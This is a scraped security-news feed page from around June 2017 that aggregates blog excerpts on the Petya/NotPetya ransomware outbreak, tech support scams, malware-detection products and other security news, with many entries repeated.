What’s All This NIST Security Noise About?
There is quite a bit of NIST security noise that should not be dismissed. Whether you are a federal agency or not, NIST has significant meaning for you. The National Institute of Standards Technology (NIST) is a lab and federal non-regulated agency organization that offers guidance to promote innovation and industrial competitiveness. When it comes […]… Read More
The post What’s All This NIST Security Noise About? appeared first on The State of Security.
from What’s All This NIST Security Noise About?
Groundhog Day 2017 – or Any Other Day
Another not cloudy but brilliant morning to wake up to. It might be summer somewhere. But I don’t need a clock radio. Instead, I consume news from around the world at breakfast or on the way to some office. But “I Got You Babe” seems to be playing everywhere. Clearly, I am not actually in […]… Read More
The post Groundhog Day 2017 – or Any Other Day appeared first on The State of Security.
from Groundhog Day 2017 – or Any Other Day
Not NotPetya (An analysis of Karo Ransomware)
While there was a lively running debate over whether it was Petya or NotPetya yesterday, we all can all agree that what locked up some of the world’s largest shipping companies, spread through the infamous SMB exploit, and may have been delivered as an infected update, was not Karo. However, this obscure ransomware family was launched into the spotlight due to early confusion over Petya's initial infection vector.
from Not NotPetya (An analysis of Karo Ransomware)
Petya May Not be the Ransomware Everyone Thought it Was
Petya, or NotPetya, doesn't seem to be a traditional ransomware. But what is it? Is Petya a more destructive version of Wannacry? Is it even ransomware at all? read more
from Petya May Not be the Ransomware Everyone Thought it Was
from Petya May Not be the Ransomware Everyone Thought it Was
BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
Permalink
from BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
from BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
Permalink
from BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
from BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
Girl Scouts to Offer Merit Badges in Cybersecurity
The Girl Scouts are going to be offering 18 merit badges in cybersecurity, to scouts as young as five years old....
from Girl Scouts to Offer Merit Badges in Cybersecurity
from Girl Scouts to Offer Merit Badges in Cybersecurity
NotPetya: Timeline of a Ransomworm
On June 27, 2017, a digital attack campaign struck banks, airports and power companies in Ukraine, Russia and parts of Europe. Security experts who analyzed the attack determined its behavior was consistent with a form of ransomware called Petya. They also observed the campaign was using a familiar exploit to spread to vulnerable machines. Let’s […]… Read More
The post NotPetya: Timeline of a Ransomworm appeared first on The State of Security.
from NotPetya: Timeline of a Ransomworm
New Tech Support Scam Strikes Amazon, eBay, and Alibaba Customers
In a world where new cyber threats seem to develop almost daily, it’s easy to forget that some tactics have stood the test of time.
Since mid-May, PhishLabs has been tracking an ongoing consumer-focused email phishing campaign.
And what tactic have they been using? The dreaded tech support scam.
No matter how much technology develops, threat actors will nearly always default to the simplest tactic that still works. And when it comes to consumer-focused phishing, there’s nothing simpler (and more effective) than a well constructed tech support scam.
from New Tech Support Scam Strikes Amazon, eBay, and Alibaba Customers
New Petya ransomware: everything you wanted to know (but were afraid to ask)
Your questions about the new Petya ransomware answered - and your chance to ask us more.
from New Petya ransomware: everything you wanted to know (but were afraid to ask)
from New Petya ransomware: everything you wanted to know (but were afraid to ask)
Girl Scouts to Offer Merit Badges in Cybersecurity
The Girl Scouts are going to be offering 18 merit badges in cybersecurity, to scouts as young as five years old.
from Girl Scouts to Offer Merit Badges in Cybersecurity
Physical Security Assessment: Traditional and Nontraditional Tools and Techniques
We've Moved! Update your Reader Now. This feed has moved to: http://feeds.solutionary.com/solutionary Update your reader now with this changed subscription address to get your latest updates from us.
from Physical Security Assessment: Traditional and Nontraditional Tools and Techniques
from Physical Security Assessment: Traditional and Nontraditional Tools and Techniques
Petya: The poison behind the latest ransomware attack
Unpatched Windows machines are getting hammered again by a new ransomware attacker.
from Petya: The poison behind the latest ransomware attack
from Petya: The poison behind the latest ransomware attack
SCADA: Changing the Dynamic
How do we build a truly resilient security framework directly incorporating micro segmentation into the SCADA systems and our network in order to protect it, when we can’t add security controls for fear of the business consequences? I think the solution is quite obvious on the surface: change the dynamic that has existed within our […]
The post SCADA: Changing the Dynamic appeared first on Radware Blog.
from SCADA: Changing the Dynamic
Deconstructing Petya: how it spreads and how to fight back
It's been 24 hours since the outbreak first hit: here's what we know now about how Petya behaves
from Deconstructing Petya: how it spreads and how to fight back
from Deconstructing Petya: how it spreads and how to fight back
Four arrested as Microsoft and UK police team up to crack down on technical support scammers
Four people have been arrested after a two-year investigation by Microsoft and British police forces into telephone scams which prey upon the vulnerable, tricking them into believing their computers have been infected by malware. Read more in my articl...
from Four arrested as Microsoft and UK police team up to crack down on technical support scammers
from Four arrested as Microsoft and UK police team up to crack down on technical support scammers
The Mechanisms of Support Scamming
Dial One for Scam: A Large-Scale Analysis of Technical Support Scams is an academic paper, but interesting*. While it doesn’t tell seasoned scam watchers much we weren’t already aware of, it does take a systematic look at how the scheme is implemented, and hopefully that will be useful to someone in a better position to pursue […]
from The Mechanisms of Support Scamming
from The Mechanisms of Support Scamming
Staying Ahead of the Curve
Tenable.io Malicious Code Prevention Report
As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.
Use Tenable.io to quickly address systems that are at risk
Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.
Malware scanning
Tenable.io includes a customizable malware scan template where you can incorporate both good and bad known MD5 hashes, along with a hosts file whitelist. On Windows systems, hosts files contain commented lines of text that consist of two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.
Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.
Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.
Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.
The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution
The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.
Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.
Vulnerabilities
The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware just to name a few.
Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.
Tenable.io uses both active and passive methods to detect malicious content
Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into website due to a cross-site scripting (XSS) or SQL injection vulnerability.
Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.
Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.
Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.
Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.
No organization is immune from vulnerabilities and attacks
No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.
Start with Tenable.io
To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.
from Staying Ahead of the Curve
Office 365 Customers Can Now Begin Using SharePoint Communication Sites
SharePoint Communication Sites allow you to have responsive internal sites that can help keep all of your users up to date and involved. read more
from Office 365 Customers Can Now Begin Using SharePoint Communication Sites
from Office 365 Customers Can Now Begin Using SharePoint Communication Sites
Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race
There are times when trying to put together an effective authentication strategy feels like competing in track-and-field events. Business and IT are supposed to be on the same team, but far too often seem to be racing toward completely different goals. Sure, it’s important to get to the finish line fast, but not at the…
The post Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race appeared first on Speaking of Security - The RSA Blog.
from Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race
Anthem to pay record $115m to settle lawsuits over massive breach
Attackers grabbed data including names, birthdates, taxpayer IDs and more from Anthem patients - a toolkit for identity theft
from Anthem to pay record $115m to settle lawsuits over massive breach
from Anthem to pay record $115m to settle lawsuits over massive breach
Tuesday, June 27, 2017
To #Petya or #NotPetya – It’s an Important Question
I’ve been blogging on WannaCry recently, my last post was all about the question, “Why was this allowed to happen?” As I stated then, Microsoft did indeed release a Bulletin MS17-010 and patch for the SMBv1 vulnerability that ultimately was exploited by the WannaCry attack in March. Presumably, every concerned system administrator patched […]
The post To #Petya or #NotPetya – It’s an Important Question appeared first on WhiteHat Security.
from To #Petya or #NotPetya – It’s an Important Question
To #Petya or #NotPetya – It’s an Important Question
Petya Ransomware I’ve been blogging on WannaCry recently, my last post was all about the question, “Why was this allowed to happen?” As I stated then, Microsoft did indeed release a Bulletin MS17-010 and patch for the SMBv1 vulnerability that ultimately was exploited by the WannaCry attack in March. Presumably, every concerned system […]
The post To #Petya or #NotPetya – It’s an Important Question appeared first on WhiteHat Security.
from To #Petya or #NotPetya – It’s an Important Question
Petya-based Ransomware Assaults Global Networks
A host of companies across industries have confirmed attacks today by a brutal wave of ransomware, including global law firm DLA Piper, U.S. pharmaceutical giant Merck, and the Danish shipping company Maersk. Although...read more
The post Petya-based Ransomware Assaults Global Networks appeared first on Webroot Threat Blog.
from Petya-based Ransomware Assaults Global Networks
Petya Ransomware Spreading Via EternalBlue Exploit
On June 27, 2017, multiple organizations – many in Europe – reported significant disruptions they are attributing to Petya ransomware. Based on initial information, this variant of the Petya ransomware may be spreading via the EternalBlue exploit used in the WannaCry attack from last month.
Trusted sources and open-source reporting have suggested that the initial infection vector for this campaign was a poisoned update for the MeDoc software suite, a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website currently displays a warning message in Russian stating: "On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!"
Our initial analysis of the artifacts and network traffic at victim networks indicate that a modified version of the EternalBlue SMB exploit was used, at least in part, to spread laterally along with WMI commands, MimiKatz, and PSExec to propagate other systems. Analysis of the artifacts associated with this campaign is still ongoing and we will update this blog as new information come available.
FireEye has confirmed the following two samples related to this attack:
- 71b6a493388e7d0b40c83ce903bc6b04
- e285b6ce047015943e685e6638bd837e
FireEye has mobilized a Community Protection Event and is continuing to investigate these reports and the threat activity involved in these disruptive incidents. FireEye as a Service (FaaS) is actively engaged in monitoring customer environments.
While FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.
|
rule FE_CPE_MS17_010_RANSOMWARE { // RANSOMNOTE // FUNCTIONALITY, APIS // COMMANDS condition: |
FireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.
Implications
This activity highlights the importance of organizations securing their systems against the EternalBlue exploit and ransomware infections. Microsoft has provided a guide for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.
from Petya Ransomware Spreading Via EternalBlue Exploit
The Amazon Echo (Horror) Show
Well done. You just paid $299 for the benefit of having a Peeping Tom in your kitchen.
from The Amazon Echo (Horror) Show
from The Amazon Echo (Horror) Show
Petya-esque ransomware is spreading across the world
 |
|
| Ringing in with echoes of WannaCry, Petya (or Petrwrap, NotPetya), is a new ransomware strain outbreak affecting many users around the world.
Categories: Tags: EternalBlueexploitgermanymalwarebytes labsNotPetyaPetrwrappetyaransomwareSMBspreadingukraineUnited Kingdomunited statesWannaCryWannaCryptWannaCryptor |
The post Petya-esque ransomware is spreading across the world appeared first on Malwarebytes Labs.
from Petya-esque ransomware is spreading across the world
Six quick facts to know about today’s global ransomware attack
This is what you need to know — right now.
from Six quick facts to know about today’s global ransomware attack
from Six quick facts to know about today’s global ransomware attack
Six quick facts to know about today’s global ransomware attack
This is what you need to know — right now.
from Six quick facts to know about today’s global ransomware attack
from Six quick facts to know about today’s global ransomware attack
Petya/NotPetya Ransomware Detection for the Modern Enterprise
A new version of the Petya malware is spreading through the European Union, primarily in Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.
Background
Petya is powered by Shadow Brokers exploits, which were leaked earlier this year, and appears to be a straightforward ransomware program. Once it has infected a computer, the virus encrypts each computer to a private key, rendering it unusable until the system is decrypted. The ransomware leverages a couple of vulnerabilities to quickly spread across the organization. It first leverages CVE-2017-0199, a vulnerability in Microsoft Office documents, which enables the execution of a malicious HTA file. The malware then infects systems that are vulnerable to MS17-010 and spreads laterally across the infrastructure.
Note: The Petya malware creates a scheduled task which reboots up to one hour after infection. If the task is removed before execution, it does not reschedule, buying you some time.
Similar to the WannaCry ransomware that infected systems globally earlier this year, Petya takes advantage of known vulnerabilities that already have patches. In a world where malware threats arise every day, chasing daily threats is not advised. Organizations everywhere and of every size need a more strategic approach to proactively manage security threats (and protect themselves and their customers) by implementing good cyber hygiene practices, including regular patching, updates, backups, and continuous monitoring.
How Tenable can help
Patch vulnerabilities
Tenable customers should immediately patch systems vulnerable to CVE-2017-0199 and MS17-010 if you haven’t already done so. Tenable.io™ Vulnerability Management has the following four plugins, released earlier this year, to detect vulnerable systems:
|
Plugin ID |
Plugin Title/Comments |
Exploits |
|
99285 |
KB4015551: Windows Server 2012 Standard April 2017 Cumulative Update |
CVE-2017-0199 |
|
99304 |
KB4015549: Windows 7 and Windows 2008 R2 April 2017 Cumulative Update |
CVE-2017-0199 |
|
97737 |
MS17-010: Security Update for Microsoft Windows SMB Server (4013389) |
ETERNALBLUE ETERNALCHAMPION ETERNALROMANCE ETERNALSYNERGY WannaCry EternalRocks |
|
97833 |
MS17-010: Security Update for Microsoft Windows SMB Server (4013389) uncredentialed check |
ETERNALBLUE ETERNALCHAMPION ETERNALROMANCE ETERNALSYNERGY WannaCry EternalRocks |
Malware scan
Tenable customers can use the Malware Scan Policy in Tenable.io™ or SecurityCenter™ to detect machines infected with Petya, and the results will be reported under plugin 59275:
YARA detection
Tenable customers can also use YARA rules to identify infected systems through the Malicious File Detection Using YARA Nessus plugin.
Here’s a sample rule from Kaspersky which can be used with Nessus to detect the Petya malware :
Dashboards
The Petya dashboard uses all the available methods mentioned above to consolidate the data for easy understanding of the systems most likely affected or at risk from the malware. The components bring in netstats from Nessus and the Nessus Network Monitor, and also display the content related to missing patches associated with SMB vulnerabilities.
Wrap-up
Most ransomware exploits well-known vulnerabilities that already have patches available. Implementing a proactive security program that includes regular patching and system updating is one of the best strategies you can use to prevent malware from infecting your systems. Make it a regular habit to patch and protect.
For more information
- Learn more about Tenable.io, the first vulnerability management platform for all modern assets
- Get a free 60-day trial of Tenable.io
Many thanks to the Tenable research team for their contributions to this blog.
from Petya/NotPetya Ransomware Detection for the Modern Enterprise
USS Fitzgerald (DDG 62)
via the United States Navy: YOKOSUKA, Japan (June 27, 2017) Family, friends and shipmates attend a memorial ...
from USS Fitzgerald (DDG 62)
from USS Fitzgerald (DDG 62)
Fighting Leakers at Apple
Apple is fighting its own battle against leakers, using people and tactics from the NSA.
According to the hour-long presentation, Apple's Global Security team employs an undisclosed number of investigators around the world to prevent information from reaching competitors, counterfeiters, and the press, as well as hunt down the source when leaks do occur. Some of these investigators have previously worked at U.S. intelligence agencies like the National Security Agency (NSA), law enforcement agencies like the FBI and the U.S. Secret Service, and in the U.S. military.
The information is from an internal briefing, which was leaked.
from Fighting Leakers at Apple
Global ransomware outbreak happening right now
There are multiple reports from countries around the world that their computers have been hit by ransomware.
from Global ransomware outbreak happening right now
from Global ransomware outbreak happening right now
South Korean banks told to pay $315,000 or suffer DDoS wrath
Online extortionists have threatened to launch distributed denial-of-service (DDoS) attacks against seven South Korean banks unless each victim pays up US $315,000 in ransom. David Bisson reports.
from South Korean banks told to pay $315,000 or suffer DDoS wrath
from South Korean banks told to pay $315,000 or suffer DDoS wrath
GDPR and HITECH: Can the past predict the future?
In February of 2017, Memorial Healthcare System settled their HIPAA violation fines for $5.5 Million USD. During an investigation, it was discovered that over 100,000 patient records had been impermissibly accessed. Allegedly, an ex-employee retained access to personal identifying information and sold data records to people who filed fraudulent tax returns using the data. Federal […]
The post GDPR and HITECH: Can the past predict the future? appeared first on Radware Blog.
from GDPR and HITECH: Can the past predict the future?
YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies
By Steve Mowll and Chris Williams POINT: Chris Williams – Advisory Architect, RSA Identity In our last blog, I stated the following about why we most commonly engage in security practices. And these two items were represented: We embrace identity projects because we need to satisfy compulsory mandates. We need to provide competitive protective services…
The post YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies appeared first on Speaking of Security - The RSA Blog.
from YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies
Watch out: don’t lose your passwords when you sign up online
Researchers have identified how an attacker could steal passwords - and answers to security questions - when you register for something online. We've got some tips for website owners and users to protect you
from Watch out: don’t lose your passwords when you sign up online
from Watch out: don’t lose your passwords when you sign up online
Akamai Launches New Solution to Help Enterprise Security Teams Address the Impact of Malware, Ransomware, and DNS-based Data Exfiltration
Today, we are proud to introduce Akamai Enterprise Threat Protector (ETP). ETP is designed to provide customers quick-to-deploy and easy-to-manage cloud-based protection against the impact of complex, targeted threats such malware, ransomware, phishing, and DNS‑based data exfiltration. One organization already...
from Akamai Launches New Solution to Help Enterprise Security Teams Address the Impact of Malware, Ransomware, and DNS-based Data Exfiltration
from Akamai Launches New Solution to Help Enterprise Security Teams Address the Impact of Malware, Ransomware, and DNS-based Data Exfiltration
From the first ATM to contactless cashpoints: the evolution of digital payments
Fifty years ago today the world’s first automated teller machine was installed – to great success, I would say. Not only is its acronym – ATM – so commonly used...
from From the first ATM to contactless cashpoints: the evolution of digital payments
from From the first ATM to contactless cashpoints: the evolution of digital payments
Fighting Leakers at Apple
Apple is fighting its own battle against leakers, using people and tactics from the NSA. According to the hour-long presentation, Apple's Global Security team employs an undisclosed number of investigators around the world to prevent information from reaching competitors, counterfeiters, and the press, as well as hunt down the source when leaks do occur. Some of these investigators have previously...
from Fighting Leakers at Apple
from Fighting Leakers at Apple
Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier
A new aircraft carrier built for the Royal Navy appears to be running the outdated 2001 Windows XP operating system on at least some of its machines. During a tour of the £3.5 billion HMS Queen Elizabeth, someone reportedly spotted a screen inside the aircraft carrier’s control room running Windows XP. Microsoft hasn’t supported this […]… Read More
The post Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier appeared first on The State of Security.
from Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier
Subscribe to:
Posts (Atom)